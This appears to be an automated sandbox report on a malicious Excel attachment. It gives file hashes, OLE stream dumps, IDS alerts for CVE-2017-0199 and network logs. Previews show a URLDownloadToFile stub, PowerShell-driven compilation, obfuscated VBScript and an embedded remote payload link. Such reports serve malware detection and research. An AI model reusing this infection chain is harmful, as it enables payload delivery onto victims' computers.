                                                                                              SHA-256:B5BB2A1A865DFEEA658FD32146C6B8607AD2BA583FEEDB67D16E49BB0B323073
                                                                                              SHA-512:BD63BE7A8E58CBC0FCE553362B83A725B5F78108C7E5861BBD7AE9496AF71CC454CE220D1FE447EECAFF9B03EACF6A24B268C2660D47A6CFE372579EB03CB904
                                                                                              Malicious:false
                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace ZXa.{. public class bq. {. [DllImport("urlmoN", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr XtrbHs,string nlcr,string Gyvr,uint u,IntPtr A);.. }..}.
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):369
                                                                                              Entropy (8bit):5.213183995937804
                                                                                              Encrypted:false
                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23f7bUzxs7+AEszIP23f7Tx:p37Lvkmb6KzTYWZEoTV
                                                                                              MD5:736DA6439D49D9FF1383CEFF5930F4D0
                                                                                              SHA1:335E6014278200F53399C127381FA5E4EDB15B01
                                                                                              SHA-256:CD511F16390C0C78C0D4ADECD6F3F538549875ACFEED5A59FFDB4A6EBD6D81FF
                                                                                              SHA-512:1AFC435A2668E48145488758CB13092F9B125FFB64CBE8059C79CB6500B0EC686547BEFD7DAD393A64B6D53D2C6C8C70AC67AB1EFC7F763D0A4427750EED4295
                                                                                              Malicious:true
                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs"
                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Category:dropped
                                                                                              Size (bytes):3072
                                                                                              Entropy (8bit):2.7606967150310195
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:etGSuJ+Jyl8scigkVrntzztkZfLm9ZvzCuWI+ycuZhNsRakS1WPNnqI:6tA+83tuJLm9ZOV1ulsRa31qqI
                                                                                              MD5:03461E4A086B6E264454F66F2699AF08
                                                                                              SHA1:E15E29F4E095E87FD45F8B4E3FA40E6A41F49DDA
                                                                                              SHA-256:FCC526F89382848760F3413317191CB27F62F1B32068213C30E76F1180F89D11
                                                                                              SHA-512:134DC390718AFCF9EC03A62E16C77D04641D417034EE0D1A094E04099236981BE89AF2503959C85BC9312F4E8C5C7C3EF8253B6EAC61CF19BCD266ED5BA3081D
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                              Category:modified
                                                                                              Size (bytes):866
                                                                                              Entropy (8bit):5.3400148668279055
                                                                                              Encrypted:false
                                                                                              SSDEEP:24:AId3ka6Kz1Eo0KaMD5DqBVKVrdFAMBJTH:Akka601Eo0KdDcVKdBJj
                                                                                              MD5:E333A81325AED2EE9D80B1B2CD783AAA
                                                                                              SHA1:4039C0284E2FDA288968F9AE4DB5296456ACB03A
                                                                                              SHA-256:822BA9A49C5D9732A70324D683B9238ADC53F087EF2612862774321EEEBFD9FD
                                                                                              SHA-512:1E09B0536EE5B472E061605A7477DD1026DF9E64FE67C3D4F95C08A85011F9A3E537AB728CCC837C10934EEC29A63DCBA0E3DFFB440B3FFB36134CC6CCEFF931
                                                                                              Malicious:false
                                                                                              Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:very short file (no magic)
                                                                                              Category:dropped
                                                                                              Size (bytes):1
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:U:U
                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                              Malicious:false
                                                                                              Preview:1
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):512
                                                                                              Entropy (8bit):0.0
                                                                                              Encrypted:false
                                                                                              SSDEEP:3::
                                                                                              MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                              SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                              SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                              SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                              Malicious:false
                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):140578
                                                                                              Entropy (8bit):3.695250393374824
                                                                                              Encrypted:false
                                                                                              SSDEEP:1536:bybqHgt5pz6GwnGF5MogA+Z4Pcofy4jJBvs15tidfr4xvZU1uv/q:bybqgt5peGwFAPc8j/E154dfrcvZUaq
                                                                                              MD5:A662B24242684290B46777977F7FBFB7
                                                                                              SHA1:E4CB41E0206EEC554B60C131BA807C6DD0ADB3C1
                                                                                              SHA-256:BE2BF60EAE60DF6FC37A5BFC23BB5E8BAB48BA0664D990B545FD4BEA239AFA0F
                                                                                              SHA-512:27602CEFCC3D29DC8BC0886B2E6BB7CF7BDB75E3B1ED56AB1F1047D8E4D8F18EB4AFB04F9028A80642FA2C4F8DA62C178CDDA23C863C4D0CF5D7C6C50905185B
                                                                                              Malicious:true
                                                                                              Preview:private function CreateSession(wsman, conStr, optDic, pingado)..    dim bombardeioFlags..    dim conOpt ..    dim bombardeio..    dim authVal..    dim encodingVal..    dim encryptVal..    dim pw..    dim tout..    ' proxy information..    dim proxyAccessType..    dim proxyAccessTypeVal..    dim proxyAuthenticationMechanism..    dim proxyAuthenticationMechanismVal..    dim proxyUsername..    dim proxyPassword..     ..    bombardeioFlags = 0..    proxyAccessType = 0..    proxyAccessTypeVal = 0..
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):1072128
                                                                                              Entropy (8bit):7.364562994960936
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:XmzHJEyfN1YpRBP539wZEDD3DERnLRmF8DGLtiovsNfrq45RqC0EG7fJXnoA17Vl:+hfgph3JDbARM8GkWTjLX
                                                                                              MD5:6E60BFB2C9138F4FC0E41C6BF9161A2C
                                                                                              SHA1:4478B5D78399B434802DD02ED70961DC7C5BA27B
                                                                                              SHA-256:4452434903A1D5B42BC590CFDBC49AA03667962FAA6D766B434660BD780CB92B
                                                                                              SHA-512:5BB74505E2E69576A2E392CCFAB4B356CE5986051B9856FACEF96435FE0577CE7A25EBF61C991ACD4839EDE0747A3A5EB12AEC0FE49272F95926EEB2A4EB4CE6
                                                                                              Malicious:false
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):26
                                                                                              Entropy (8bit):3.95006375643621
                                                                                              Encrypted:false
                                                                                              SSDEEP:3:ggPYV:rPYV
                                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                              Malicious:false
                                                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 24 07:39:46 2024, Security: 1
                                                                                              Category:dropped
                                                                                              Size (bytes):1072128
                                                                                              Entropy (8bit):7.364562994960936
                                                                                              Encrypted:false
                                                                                              SSDEEP:12288:XmzHJEyfN1YpRBP539wZEDD3DERnLRmF8DGLtiovsNfrq45RqC0EG7fJXnoA17Vl:+hfgph3JDbARM8GkWTjLX
                                                                                              MD5:6E60BFB2C9138F4FC0E41C6BF9161A2C
                                                                                              SHA1:4478B5D78399B434802DD02ED70961DC7C5BA27B
                                                                                              SHA-256:4452434903A1D5B42BC590CFDBC49AA03667962FAA6D766B434660BD780CB92B
                                                                                              SHA-512:5BB74505E2E69576A2E392CCFAB4B356CE5986051B9856FACEF96435FE0577CE7A25EBF61C991ACD4839EDE0747A3A5EB12AEC0FE49272F95926EEB2A4EB4CE6
                                                                                              Malicious:true
                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 23 15:32:04 2024, Security: 1
                                                                                              Entropy (8bit):7.343322753419543
                                                                                              TrID:
                                                                                              • Microsoft Excel sheet (30009/1) 47.99%
                                                                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                              File name:A & C Metrology OC 5457144.xls
                                                                                              File size:1'081'344 bytes
                                                                                              MD5:48c40411ba277f1c9829871605366dc0
                                                                                              SHA1:8e2a93e0bd4e23b655de720b5d75f1e01420c17e
                                                                                              SHA256:86e985895fb6d155d4d6c894c8d038b76f5e6db694ca0c59867ee43867d49f61
                                                                                              SHA512:ac3ae0cf032c844bbf70d46372726b76fd7264c8b5a8c2a68e6c4acefad9a43698e5839565a4e299af1543973d73e5f905a69297f8057ee44915269197e50cdc
                                                                                              SSDEEP:12288:TmzHJEyfN1YFuBPD39gZEpD3DERnLRmF8D9eaEc1flr/Wsnd3ZhSK:ChfgFI3lpbARM8Ze1WNrbp
                                                                                              TLSH:0E35AEC3A9198F66ED560234A6F3876E5324CC83C522472F22F4762879FB7D4245AF8D
                                                                                              Icon Hash:276ea3a6a6b7bfbf
                                                                                              Document Type:OLE
                                                                                              Number of OLE Files:1
                                                                                              Has Summary Info:
                                                                                              Application Name:Microsoft Excel
                                                                                              Encrypted Document:True
                                                                                              Contains Word Document Stream:False
                                                                                              Contains Workbook/Book Stream:True
                                                                                              Contains PowerPoint Document Stream:False
                                                                                              Contains Visio Document Stream:False
                                                                                              Contains ObjectPool Stream:False
                                                                                              Flash Objects Count:0
                                                                                              Contains VBA Macros:True
                                                                                              Code Page:1252
                                                                                              Author:
                                                                                              Last Saved By:
                                                                                              Create Time:2006-09-16 00:00:00
                                                                                              Last Saved Time:2024-10-23 14:32:04
                                                                                              Creating Application:Microsoft Excel
                                                                                              Security:1
                                                                                              Document Code Page:1252
                                                                                              Thumbnail Scaling Desired:False
                                                                                              Contains Dirty Links:False
                                                                                              Shared Document:False
                                                                                              Changed Hyperlinks:False
                                                                                              Application Version:786432
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                              VBA File Name:Sheet1.cls
                                                                                              Stream Size:977
                                                                                              Attribute VB_Name = "Sheet1"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                              VBA File Name:Sheet2.cls
                                                                                              Stream Size:977
                                                                                              Attribute VB_Name = "Sheet2"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                              VBA File Name:Sheet3.cls
                                                                                              Stream Size:977
                                                                                              Attribute VB_Name = "Sheet3"
                                                                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                              VBA File Name:ThisWorkbook.cls
                                                                                              Stream Size:985
                                                                                              Attribute VB_Name = "ThisWorkbook"
                                                                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                              Attribute VB_GlobalNameSpace = False
                                                                                              Attribute VB_Creatable = False
                                                                                              Attribute VB_PredeclaredId = True
                                                                                              Attribute VB_Exposed = True
                                                                                              Attribute VB_TemplateDerived = False
                                                                                              Attribute VB_Customizable = True
                                                                                              

                                                                                              General
                                                                                              Stream Path:\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:244
                                                                                              Entropy:2.889430592781307
                                                                                              Base64 Encoded:False
                                                                                              General
                                                                                              Stream Path:\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:200
                                                                                              Entropy:3.2403503175049817
                                                                                              Base64 Encoded:False
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:244
                                                                                              Entropy:2.701136490257069
                                                                                              Base64 Encoded:False
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
                                                                                              Stream Size:90976
                                                                                              Entropy:4.0202822243037755
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0002578E/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.219515110876372
                                                                                              Base64 Encoded:False
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0002578E/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:33181
                                                                                              Entropy:7.705040299215262
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032715/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:99
                                                                                              Entropy:3.631242196770981
                                                                                              Base64 Encoded:False
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032715/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:38341
                                                                                              Entropy:7.85773182578822
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.25248375192737
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x5DocumentSummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:484
                                                                                              Entropy:3.922883556049869
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/\x5SummaryInformation
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:19956
                                                                                              Entropy:3.047871976270467
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00032B6D/Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:95624
                                                                                              Entropy:3.890268972586762
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00033186/\x1CompObj
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:114
                                                                                              Entropy:4.219515110876372
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD00033186/Package
                                                                                              CLSID:
                                                                                              File Type:Microsoft Excel 2007+
                                                                                              Stream Size:52190
                                                                                              Entropy:7.870757596146126
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/\x1Ole
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:20
                                                                                              Entropy:0.5689955935892812
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . . . . . . . . . . . . . . . . .
                                                                                              Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/\x3ObjInfo
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:4
                                                                                              Entropy:0.8112781244591328
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . .
                                                                                              Data Raw:00 00 03 00
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/MBD0018D4CE/Contents
                                                                                              CLSID:
                                                                                              File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                                                                                              Stream Size:197671
                                                                                              Entropy:6.989042939766534
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D5/Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:212905
                                                                                              Entropy:7.612848324441619
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:MBD0026E5D6/\x1Ole
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:722
                                                                                              Entropy:4.612786048273898
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:. . . . ? c Q . u . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . u . 4 . u . . . k . i . d . s . / . L . U . S . V . b . x . ? . & . t . r . i . n . k . e . t . = . n . i . c . e . & . d . y . n . a . m . o . = . q . u . i . z . z . i . c . a . l . & . j . o . b . = . u . p . p . i . t . y . & . i . m . a . g . i . n . a . t . i . o . n . = . m . o . d . e . r . n . & . f . l . u . t . e . = . b . o . i . l . i . n . g . & . S . U . V . = . m . o . t . i . o . n . l . e . s
                                                                                              General
                                                                                              Stream Path:Workbook
                                                                                              CLSID:
                                                                                              File Type:Applesoft BASIC program data, first line number 16
                                                                                              Stream Size:312403
                                                                                              Entropy:7.9986452340211
                                                                                              Base64 Encoded:True
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                                              CLSID:
                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                              Stream Size:535
                                                                                              Entropy:5.297593062281836
                                                                                              Base64 Encoded:True
                                                                                              Data ASCII:I D = " { 6 E E E 9 8 B 2 - 6 5 2 A - 4 E 6 8 - B F F 6 - F 1 1 0 B D 8 8 F E 3 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 7 E 5 D 7 6 5 3 7 A 5 A 3 A 9 A
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:104
                                                                                              Entropy:3.0488640812019017
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:2644
                                                                                              Entropy:3.9892167554195908
                                                                                              Base64 Encoded:False
                                                                                              Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                                                              General
                                                                                              Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                                                              CLSID:
                                                                                              File Type:data
                                                                                              Stream Size:553
                                                                                              Entropy:6.375377252481979
                                                                                              Base64 Encoded:True
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-24T08:39:29.928648+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49162 | 192.210.215.8 | 80 | TCP
2024-10-24T08:39:29.928661+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.210.215.8 | 80 | 192.168.2.22 | 49162 | TCP
2024-10-24T08:39:33.317459+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49164 | 192.210.215.8 | 80 | TCP
2024-10-24T08:39:33.317474+0200 | 2024197 | ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) | 1 | 192.210.215.8 | 80 | 192.168.2.22 | 49164 | TCP
2024-10-24T08:39:54.716795+0200 | 2024449 | ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl | 1 | 192.168.2.22 | 49170 | 192.210.215.8 | 80 | TCP
2024-10-24T08:40:06.632900+0200 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.250.186.97 | 443 | 192.168.2.22 | 49172 | TCP
2024-10-24T08:40:14.905847+0200 | 2049038 | ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 | 1 | 142.250.186.97 | 443 | 192.168.2.22 | 49174 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Oct 24, 2024 08:39:29.928647995 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928661108 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928663969 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928670883 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928683043 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.928683996 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928703070 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.928709984 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.934036016 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934047937 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934055090 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:29.934098005 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:29.934333086 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047189951 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047213078 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047230959 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047244072 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047255039 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047260046 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047297001 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047297001 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047750950 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047791958 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047878027 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047889948 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047900915 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047910929 CEST8049162192.210.215.8192.168.2.22
                                                                                              Oct 24, 2024 08:39:30.047919989 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047951937 CEST4916280192.168.2.22192.210.215.8
                                                                                              Oct 24, 2024 08:39:30.047960997 CEST4916280192.168.2.22192.210.215.8
